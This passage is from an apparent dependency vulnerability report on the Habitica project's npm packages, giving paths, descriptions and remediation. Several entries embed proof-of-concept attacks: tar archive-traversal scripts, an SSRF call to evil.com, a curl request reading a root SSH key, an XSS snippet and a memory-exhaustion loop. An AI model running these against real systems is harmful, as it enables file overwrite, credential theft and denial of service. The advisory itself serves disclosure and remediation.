| Remote Code Execution | Client | Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation. For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code. |
| Property Injection | Client | The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens. For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges. |
Affected environments
The following environments are susceptible to a Prototype Pollution attack:
Application server
Web server
Web browser
How to prevent
Freeze the prototype— use
Object.freeze (Object.prototype).Require schema validation of JSON input.
Avoid using unsafe recursive merge functions.
Consider using objects without prototypes (for example,
Object.create(null)), breaking the prototype chain and preventing pollution.As a best practice use
Mapinstead ofObject.
For more information on this vulnerability type:
Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018
Remediation
Upgrade tough-cookie to version 4.1.3 or higher.
References
medium severity
- Vulnerable module: xmldom
- Introduced through: in-app-purchase@1.11.4
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › xmldom@0.1.19
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › xml-crypto@0.10.1 › xmldom@0.1.19
Overview
xmldom is an A pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module.
Affected versions of this package are vulnerable to Improper Input Validation. It does not correctly escape special characters when serializing elements are removed from their ancestor. This may lead to unexpected syntactic changes during XML processing in some downstream applications.
Note: Customers who use "xmldom" package, should use "@xmldom/xmldom" instead, as "xmldom" is no longer maintained.
Remediation
There is no fixed version for xmldom.
References
medium severity
- Vulnerable module: tar
- Introduced through: bcrypt@5.1.1
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › bcrypt@5.1.1 › @mapbox/node-pre-gyp@1.0.11 › tar@6.2.1Remediation: Upgrade to bcrypt@6.0.0.
Overview
tar is a full-featured Tar for Node.js.
Affected versions of this package are vulnerable to Improper Handling of Unicode Encoding in Path Reservations via Unicode Sharp-S (ß) Collisions on macOS APFS. An attacker can overwrite arbitrary files by exploiting Unicode normalization collisions in filenames within a malicious tar archive on case-insensitive or normalization-insensitive filesystems.
Note:
This is only exploitable if the system is running on a filesystem such as macOS APFS or HFS+ that ignores Unicode normalization.
Workaround
This vulnerability can be mitigated by filtering out all SymbolicLink entries when extracting tarball data.
PoC
const tar = require('tar');
const fs = require('fs');
const path = require('path');
const { PassThrough } = require('stream');
const exploitDir = path.resolve('race_exploit_dir');
if (fs.existsSync(exploitDir)) fs.rmSync(exploitDir, { recursive: true, force: true });
fs.mkdirSync(exploitDir);
console.log('[*] Testing...');
console.log(`[*] Extraction target: ${exploitDir}`);
// Construct stream
const stream = new PassThrough();
const contentA = 'A'.repeat(1000);
const contentB = 'B'.repeat(1000);
// Key 1: "f_ss"
const header1 = new tar.Header({
path: 'collision_ss',
mode: 0o644,
size: contentA.length,
});
header1.encode();
// Key 2: "f_ß"
const header2 = new tar.Header({
path: 'collision_ß',
mode: 0o644,
size: contentB.length,
});
header2.encode();
// Write to stream
stream.write(header1.block);
stream.write(contentA);
stream.write(Buffer.alloc(512 - (contentA.length % 512))); // Padding
stream.write(header2.block);
stream.write(contentB);
stream.write(Buffer.alloc(512 - (contentB.length % 512))); // Padding
// End
stream.write(Buffer.alloc(1024));
stream.end();
// Extract
const extract = new tar.Unpack({
cwd: exploitDir,
// Ensure jobs is high enough to allow parallel processing if locks fail
jobs: 8
});
stream.pipe(extract);
extract.on('end', () => {
console.log('[*] Extraction complete');
// Check what exists
const files = fs.readdirSync(exploitDir);
console.log('[*] Files in exploit dir:', files);
files.forEach(f => {
const p = path.join(exploitDir, f);
const stat = fs.statSync(p);
const content = fs.readFileSync(p, 'utf8');
console.log(`File: ${f}, Inode: ${stat.ino}, Content: ${content.substring(0, 10)}... (Length: ${content.length})`);
});
if (files.length === 1 || (files.length === 2 && fs.statSync(path.join(exploitDir, files[0])).ino === fs.statSync(path.join(exploitDir, files[1])).ino)) {
console.log('\[*] GOOD');
} else {
console.log('[-] No collision');
}
});
Remediation
Upgrade tar to version 7.5.4 or higher.
References
medium severity
- Vulnerable module: decompress-tar
- Introduced through: gulp-imagemin@7.1.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-build@3.0.0 › decompress@4.2.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-build@3.0.0 › decompress@4.2.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-build@3.0.0 › decompress@4.2.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-build@3.0.0 › decompress@4.2.1 › decompress-tarbz2@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-build@3.0.0 › decompress@4.2.1 › decompress-tarbz2@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-build@3.0.0 › decompress@4.2.1 › decompress-tarbz2@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-build@3.0.0 › decompress@4.2.1 › decompress-targz@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-build@3.0.0 › decompress@4.2.1 › decompress-targz@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-build@3.0.0 › decompress@4.2.1 › decompress-targz@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-build@3.0.0 › download@6.2.5 › decompress@4.2.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-build@3.0.0 › download@6.2.5 › decompress@4.2.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-build@3.0.0 › download@6.2.5 › decompress@4.2.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-wrapper@4.1.0 › download@7.1.0 › decompress@4.2.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-wrapper@4.1.0 › download@7.1.0 › decompress@4.2.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-wrapper@4.1.0 › download@7.1.0 › decompress@4.2.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-build@3.0.0 › download@6.2.5 › decompress@4.2.1 › decompress-tarbz2@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-build@3.0.0 › download@6.2.5 › decompress@4.2.1 › decompress-tarbz2@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-build@3.0.0 › download@6.2.5 › decompress@4.2.1 › decompress-tarbz2@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-wrapper@4.1.0 › download@7.1.0 › decompress@4.2.1 › decompress-tarbz2@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-wrapper@4.1.0 › download@7.1.0 › decompress@4.2.1 › decompress-tarbz2@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-wrapper@4.1.0 › download@7.1.0 › decompress@4.2.1 › decompress-tarbz2@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-build@3.0.0 › download@6.2.5 › decompress@4.2.1 › decompress-targz@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-build@3.0.0 › download@6.2.5 › decompress@4.2.1 › decompress-targz@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-build@3.0.0 › download@6.2.5 › decompress@4.2.1 › decompress-targz@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-wrapper@4.1.0 › download@7.1.0 › decompress@4.2.1 › decompress-targz@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-wrapper@4.1.0 › download@7.1.0 › decompress@4.2.1 › decompress-targz@4.1.1 › decompress-tar@4.1.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-wrapper@4.1.0 › download@7.1.0 › decompress@4.2.1 › decompress-targz@4.1.1 › decompress-tar@4.1.1
Overview
decompress-tar is a tar plugin for decompress.
Affected versions of this package are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip). It is possible to bypass the security measures provided by decompress and conduct ZIP path traversal through symlinks.
PoC
const decompress = require('decompress');
decompress('slip.tar.gz', 'dist').then(files => {
console.log('done!');
});
Details
It is exploited using a specially crafted zip archive, that holds path traversal filenames. When exploited, a filename in a malicious archive is concatenated to the target extraction directory, which results in the final path ending up outside of the target folder. For instance, a zip may hold a file with a "../../file.exe" location and thus break out of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.
The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicous file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:
+2018-04-15 22:04:29 ..... 19 19 good.txt
+2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys
Remediation
There is no fixed version for decompress-tar.
References
medium severity
- Vulnerable module: node-forge
- Introduced through: @parse/node-apn@5.2.3
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › @parse/node-apn@5.2.3 › node-forge@1.3.1Remediation: Upgrade to @parse/node-apn@7.0.0.
Overview
node-forge is a JavaScript implementations of network transports, cryptography, ciphers, PKI, message digests, and various utilities.
Affected versions of this package are vulnerable to Integer Overflow or Wraparound via the derToOid function in the asn1.js file, which decodes ASN.1 structures containing OIDs with oversized arcs. An attacker can bypass security decisions based on OID validation by crafting malicious ASN.1 data that exploits 32-bit bitwise truncation.
Remediation
Upgrade node-forge to version 1.3.2 or higher.
References
medium severity
- Vulnerable module: axios
- Introduced through: @slack/webhook@6.1.0, apple-auth@1.0.9 and others
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › @slack/webhook@6.1.0 › axios@0.21.4Remediation: Upgrade to @slack/webhook@7.0.0.
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › apple-auth@1.0.9 › axios@0.21.4
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › amplitude@6.0.0 › axios@0.26.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › node-gcm@1.1.4 › axios@1.6.8
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › winston-loggly-bulk@3.3.3 › node-loggly-bulk@4.0.2 › axios@1.7.4
Overview
axios is a promise-based HTTP client for the browser and Node.js.
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) due to the allowAbsoluteUrls attribute being ignored in the call to the buildFullPath function from the HTTP adapter. An attacker could launch SSRF attacks or exfiltrate sensitive data by tricking applications into sending requests to malicious endpoints.
PoC
const axios = require('axios');
const client = axios.create({baseURL: 'http://example.com/', allowAbsoluteUrls: false});
client.get('http://evil.com');
Remediation
Upgrade axios to version 0.30.0, 1.8.2 or higher.
References
medium severity
- Vulnerable module: axios
- Introduced through: @slack/webhook@6.1.0, apple-auth@1.0.9 and others
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › @slack/webhook@6.1.0 › axios@0.21.4Remediation: Upgrade to @slack/webhook@7.0.0.
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › apple-auth@1.0.9 › axios@0.21.4
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › amplitude@6.0.0 › axios@0.26.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › node-gcm@1.1.4 › axios@1.6.8
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › winston-loggly-bulk@3.3.3 › node-loggly-bulk@4.0.2 › axios@1.7.4
Overview
axios is a promise-based HTTP client for the browser and Node.js.
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) due to not setting allowAbsoluteUrls to false by default when processing a requested URL in buildFullPath(). It may not be obvious that this value is being used with the less safe default, and URLs that are expected to be blocked may be accepted. This is a bypass of the fix for the vulnerability described in CVE-2025-27152.
Remediation
Upgrade axios to version 0.30.0, 1.8.3 or higher.
References
medium severity
- Vulnerable module: inflight
- Introduced through: glob@8.1.0, apidoc@0.54.0 and others
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › glob@8.1.0 › inflight@1.0.6
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › apidoc@0.54.0 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › rimraf@3.0.2 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › bcrypt@5.1.1 › @mapbox/node-pre-gyp@1.0.11 › rimraf@3.0.2 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › vinyl-fs@3.0.3 › glob-stream@6.1.0 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin@7.0.1 › globby@10.0.2 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › eslint@8.57.1 › file-entry-cache@6.0.1 › flat-cache@3.2.0 › rimraf@3.0.2 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › exec-buffer@3.2.0 › rimraf@2.7.1 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › eslint-config-habitrpg@6.2.3 › eslint@6.8.0 › file-entry-cache@5.0.1 › flat-cache@2.0.1 › rimraf@2.6.3 › glob@7.2.3 › inflight@1.0.6
Overview
Affected versions of this package are vulnerable to Missing Release of Resource after Effective Lifetime via the makeres function due to improperly deleting keys from the reqs object after execution of callbacks. This behavior causes the keys to remain in the reqs object, which leads to resource exhaustion.
Exploiting this vulnerability results in crashing the node process or in the application crash.
Note: This library is not maintained, and currently, there is no fix for this issue. To overcome this vulnerability, several dependent packages have eliminated the use of this library.
To trigger the memory leak, an attacker would need to have the ability to execute or influence the asynchronous operations that use the inflight module within the application. This typically requires access to the internal workings of the server or application, which is not commonly exposed to remote users. Therefore, “Attack vector” is marked as “Local”.
PoC
const inflight = require('inflight');
function testInflight() {
let i = 0;
function scheduleNext() {
let key = `key-${i++}`;
const callback = () => {
};
for (let j = 0; j < 1000000; j++) {
inflight(key, callback);
}
setImmediate(scheduleNext);
}
if (i % 100 === 0) {
console.log(process.memoryUsage());
}
scheduleNext();
}
testInflight();
Remediation
There is no fixed version for inflight.
References
medium severity
- Vulnerable module: tar
- Introduced through: bcrypt@5.1.1
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › bcrypt@5.1.1 › @mapbox/node-pre-gyp@1.0.11 › tar@6.2.1Remediation: Upgrade to bcrypt@6.0.0.
Overview
tar is a full-featured Tar for Node.js.
Affected versions of this package are vulnerable to Directory Traversal via processing of hardlinks. An attacker can read or overwrite arbitrary files on the file system by crafting a malicious TAR archive that bypasses path traversal protections during extraction.
Details
A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.
Directory Traversal vulnerabilities can be generally divided into two types:
- Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.
st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.
If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.
curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa
Note %2e is the URL encoded version of . (dot).
- Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as
Zip-Slip.
One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.
The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:
2018-04-15 22:04:29 ..... 19 19 good.txt
2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys
Remediation
Upgrade tar to version 7.5.7 or higher.
References
medium severity
- Vulnerable module: tar
- Introduced through: bcrypt@5.1.1
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › bcrypt@5.1.1 › @mapbox/node-pre-gyp@1.0.11 › tar@6.2.1Remediation: Upgrade to bcrypt@6.0.0.
Overview
tar is a full-featured Tar for Node.js.
Affected versions of this package are vulnerable to Directory Traversal via insufficient sanitization of the linkpath parameter during archive extraction. An attacker can overwrite arbitrary files or create malicious symbolic links by crafting a tar archive with hardlink or symlink entries that resolve outside the intended extraction directory.
PoC
const fs = require('fs')
const path = require('path')
const tar = require('tar')
const out = path.resolve('out_repro')
const secret = path.resolve('secret.txt')
const tarFile = path.resolve('exploit.tar')
const targetSym = '/etc/passwd'
// Cleanup & Setup
try { fs.rmSync(out, {recursive:true, force:true}); fs.unlinkSync(secret) } catch {}
fs.mkdirSync(out)
fs.writeFileSync(secret, 'ORIGINAL_DATA')
// 1. Craft malicious Link header (Hardlink to absolute local file)
const h1 = new tar.Header({
path: 'exploit_hard',
type: 'Link',
size: 0,
linkpath: secret
})
h1.encode()
// 2. Craft malicious Symlink header (Symlink to /etc/passwd)
const h2 = new tar.Header({
path: 'exploit_sym',
type: 'SymbolicLink',
size: 0,
linkpath: targetSym
})
h2.encode()
// Write binary tar
fs.writeFileSync(tarFile, Buffer.concat([ h1.block, h2.block, Buffer.alloc(1024) ]))
console.log('[*] Extracting malicious tarball...')
// 3. Extract with default secure settings
tar.x({
cwd: out,
file: tarFile,
preservePaths: false
}).then(() => {
console.log('[*] Verifying payload...')
// Test Hardlink Overwrite
try {
fs.writeFileSync(path.join(out, 'exploit_hard'), 'OVERWRITTEN')
if (fs.readFileSync(secret, 'utf8') === 'OVERWRITTEN') {
console.log('[+] VULN CONFIRMED: Hardlink overwrite successful')
} else {
console.log('[-] Hardlink failed')
}
} catch (e) {}
// Test Symlink Poisoning
try {
if (fs.readlinkSync(path.join(out, 'exploit_sym')) === targetSym) {
console.log('[+] VULN CONFIRMED: Symlink points to absolute path')
} else {
console.log('[-] Symlink failed')
}
} catch (e) {}
})
Details
A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.
Directory Traversal vulnerabilities can be generally divided into two types:
- Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.
st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.
If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.
curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa
Note %2e is the URL encoded version of . (dot).
- Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as
Zip-Slip.
One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.
The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:
2018-04-15 22:04:29 ..... 19 19 good.txt
2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys
Remediation
Upgrade tar to version 7.5.3 or higher.
References
medium severity
- Vulnerable module: bootstrap
- Introduced through: apidoc@0.54.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › apidoc@0.54.0 › bootstrap@3.4.1
Overview
bootstrap is a popular front-end framework for faster and easier web development.
Affected versions of this package are vulnerable to Cross-site Scripting through the data-loading-text attribute in the button component. An attacker can execute arbitrary JavaScript code by injecting malicious scripts into this attribute.
Note:
This vulnerability is under active investigation and it may be updated with further details.
PoC
<input
id="firstName"
type="text"
value="<script>alert('XSS Input Success')</script><span>Loading XSS</span>"
/>
<button
class="btn btn-primary input-test"
data-loading-text="<span>I'm Loading</span>"
type="button"
>
Click Me
</button>
<script>
$(function () {
$('.input-test').click(function () {
var inputValue = $('#firstName').val();
$(this).data('loadingText', inputValue);
$(this).button('loading', inputValue);
});
});
</script>
Details
Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.
This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.
Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.
Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as < and > can be coded as > in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.
The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.
Types of attacks
There are a few methods by which XSS can be manipulated:
| Type | Origin | Description |
|---|---|---|
| Stored | Server | The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link. |
| Reflected | Server | The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser. |
| DOM-based | Client | The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data. |
| Mutated | The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters. |
Affected environments
The following environments are susceptible to an XSS attack:
- Web servers
- Application servers
- Web application environments
How to prevent
This section describes the top best practices designed to specifically protect your code:
- Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
- Convert special characters such as
?,&,/,<,>and spaces to their respective HTML or URL encoded equivalents. - Give users the option to disable client-side scripts.
- Redirect invalid requests.
- Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
- Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
- Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.
Remediation
Upgrade bootstrap to version 4.0.0 or higher.
References
medium severity
- Vulnerable module: got
- Introduced through: gulp-imagemin@7.1.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-build@3.0.0 › download@6.2.5 › got@7.1.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-build@3.0.0 › download@6.2.5 › got@7.1.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-build@3.0.0 › download@6.2.5 › got@7.1.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-wrapper@4.1.0 › download@7.1.0 › got@8.3.2
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-wrapper@4.1.0 › download@7.1.0 › got@8.3.2
-
